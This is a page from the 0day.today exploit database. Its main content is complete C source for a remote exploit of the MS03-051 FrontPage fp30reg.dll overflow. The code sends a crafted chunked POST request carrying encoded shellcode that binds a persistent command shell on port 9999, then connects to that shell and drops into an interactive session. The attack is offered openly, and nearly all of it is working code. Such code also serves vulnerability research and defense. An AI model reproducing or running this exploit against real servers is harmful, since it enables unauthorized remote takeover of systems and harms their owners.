0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)
============================================================= MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051) ============================================================= /******************************************************************************* Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore Exploit by Adik netmaniac hotmail kg Binds persistent command shell on port 9999 Tested on Windows 2000 Professional SP3 English version (fp30reg.dll ver 4.0.2.5526) -[ 13/Nov/2003 ]- ********************************************************************************/ #include <stdio.h> #include <string.h> #include <winsock.h> #pragma comment(lib,"ws2_32") #define VER "0.1" /******** bind shellcode spawns persistent shell on port 9999 *****************************/ unsigned char kyrgyz_bind_code[] = { 0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33, 0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; void cmdshell (int sock); long gimmeip(char *hostname); int main(int argc,char *argv[]) { WSADATA wsaData; struct sockaddr_in targetTCP; struct hostent *host; int sockTCP,s; unsigned short port = 80; long ip; unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"; unsigned char packet[3000],data[1500]; unsigned char ecx[] = "\xe0\xf3\xd4\x67"; unsigned char edi[] = "\xff\xd0\x90\x90"; unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll unsigned char shortjmp[] = "\xeb\x10"; printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n\n", VER); if(argc < 2) { printf(" Usage: %s [Target] <port>\n" " eg: fp30reg.exe 192.168.63.130\n\n",argv[0]); return 1; } if(argc==3) port = atoi(argv[2]); WSAStartup(0x0202, &wsaData); printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port); ip=gimmeip(argv[1]); memset(&targetTCP, 0, sizeof(targetTCP)); memset(packet,0,sizeof(packet)); targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(port); sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]); memset(data, 0x90, sizeof(data)-1); data[sizeof(data)-1] = '\x0'; memcpy(&data[16],edi,sizeof(edi)-1); memcpy(&data[20],ecx,sizeof(ecx)-1); memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1); memcpy(&data[250+14],call,sizeof(call)-1); memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Socket initialized...\n"); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("[*] Connection to host failed! Exiting...\n"); WSACleanup(); exit(1); } printf("[*] Checking for presence of fp30reg.dll..."); if (send(sockTCP, packet, strlen(packet),0) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); WSACleanup(); return 1; } memset(packet,0,sizeof(packet)); if (recv(sockTCP, packet, sizeof(packet),0) == -1) { printf("[x] Failed to receive packet! Exiting...\n"); WSACleanup(); return 1; } if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0') printf(" Found!\n"); else { printf(" Not Found!! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Packet injected!\n"); closesocket(sockTCP); printf("[*] Sleeping "); for(s=0;s<13000;s+=1000) { printf(". "); Sleep(1000); } printf("\n[*] Connecting to host: %s on port 9999",argv[1]); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(9999); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n"); WSACleanup(); exit(1); } printf("\n[*] Dropping to shell...\n\n"); cmdshell(sockTCP); return 0; } /*********************************************************************************/ void cmdshell (int sock) { struct timeval tv; int length; unsigned long o[2]; char buffer[1000]; tv.tv_sec = 1; tv.tv_usec = 0; while (1) { o[0] = 1; o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv); if(length == 1) { length = recv (sock, buffer, sizeof (buffer), 0); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } length = write (1, buffer, length); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } } else { length = read (0, buffer, sizeof (buffer)); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } length = send(sock, buffer, length, 0); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } } } } /*********************************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); WSACleanup(); exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } /*********************************************************************************/ # 0day.today [2024-12-24] #